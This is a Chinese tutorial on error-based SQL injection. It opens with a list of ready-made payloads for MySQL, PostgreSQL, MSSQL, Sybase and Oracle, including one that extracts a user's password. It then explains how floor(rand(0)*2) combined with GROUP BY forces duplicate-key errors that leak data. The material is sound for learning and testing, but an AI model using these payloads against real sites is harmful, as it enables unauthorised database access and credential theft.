sql注入报错注入原理解析
先放上几条payload,免费自取~
1' and (select 1 from (select null,count(*),concat(0x3a,0x3a,(select password from users limit 0,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a)x)%23
select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x;
1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+
1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) --+
如果关键表被禁用:
select count(*) from (select 1 union select null union select !1)x group by concat(version(),floor(rand(0)*2))
如果rand()函数被禁用可以使用用户变量
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
其他数据库报错payload
PostgreSQL: /?param=1 and(1)=cast(version() as numeric)--
MSSQL: /?param=1 and(1)=convert(int,@@version)--
Sybase: /?param=1 and(1)=convert(int,@@version)--
Oracle >=9.0: /?param=1 and(1)=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select
replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1)||chr(62))) from dual)--
首先先来看一下,这里有一个D用户表,里面有13条数据
然后我们用报错语句进行查询
select count(*),(concat(floor(rand()*2),0x3a,(select version())))x from users group by x;
成功的把数据库的版本信息以报错的形式显示出来。
要理解这个错误产生的原因,我们首先要知道group by语句都做了什么,继续往下看
- 现在我们通过年龄对这个表中的数据进行下分组:
select username,count(*) from users group by username;
这时候形成了一个新的表,在最开始的时候后我们看到的是一个username-count()的空表,但是在group by执行过程中,一行一行的去扫描原始表的username字段,如果username在username-count()不存在,那么就将他插入,并置count()置1,如果username在username-count()表中已经存在,那么就在原来的count(*)基础上加1,就这样直到扫描完整个表,就得到我们看到的这个表了。
这里有特别重要的一点,group by后面的字段时虚拟表的主键,也就是说它是不能重复的,这是后面报错成功的关键点(切记切记)
接着上面的说,既然说报错的主要原因是因为虚拟表重复了,那它是怎么重复的,什么时候重复的,这个时候就该看rand()的扎个函数
-
rand()用法:获取0~1范围内的随机数
图片.png 可以看到rand()生成的数据毫无规律,而rand(0)生成的数据则有规律可循
现在我们弄清楚了group by语句的工作流程,以及rand()与rand(0)的区别,接下来就是重点了,其实mysql官方有给过提示,就是查询的时候如果使用rand()的话,该值会被计算多次,那这个“被计算多次”到底是什么意思,就是在使用group by的时候,floor(rand(0)*2)会被执行一次,如果虚表不存在记录,插入虚表的时候会再被执行一次
- 第一次:我们之前不是说了会把group by后面的字段值拿到虚拟表中去对比吗,在对比之前肯定要知道group by后面字段的值,所以第一次的运算就发生在这里。
- 第二次:现在假设我们下一次扫描的字段的值没有在虚拟表中出现,也就是group by后面的字段的值在虚拟表中还不存在,那么我们就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致错误!
okey,理论到此结束,下面举个栗子
select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x;
-
这里我用的是rand(0),不是rand()
用rand(0)生成一个有规律的序列
图片.png
然后根据理论走,刚开始虚拟表是空的,就像是这样
- 当我扫描原始表的第一项时,第一次计算,floor(rand(0)*2)是0,然后和数据库的版本号(假设就是5.5.53)拼接,到虚拟表里去寻找x有没有x的值是[email protected]的数据项,结果显然是没有,那么接下来就将它插入到上表中,但是还记得吗,在插入之前会进行第二次计算,这时x的值就变成了[email protected],所以虚拟表变成了下面这样:
- 现在扫描原始表的第二项,第一次计算x==’[email protected]‘,已经存在,不需要进行第二次计算,直接插入,得到下表:
- 扫描原始表的第三项,第一次计算x==’[email protected]’,虚拟表中找不到,那么进行第二次计算,这时x==’[email protected]’,然后插入,但是插入的时候问题就发生了,虚拟表中已经存在以[email protected]为主键的数据项了(第一步),插入失败,然后就报错了
上面是使用rand(0)的情况,rand(0)是比较稳定的,所以每次执行都可以报错,但是如果使用rand()的话,因为它生成的序列是随机的嘛,所以并不是每次执行都会报错(欧皇请自动忽略)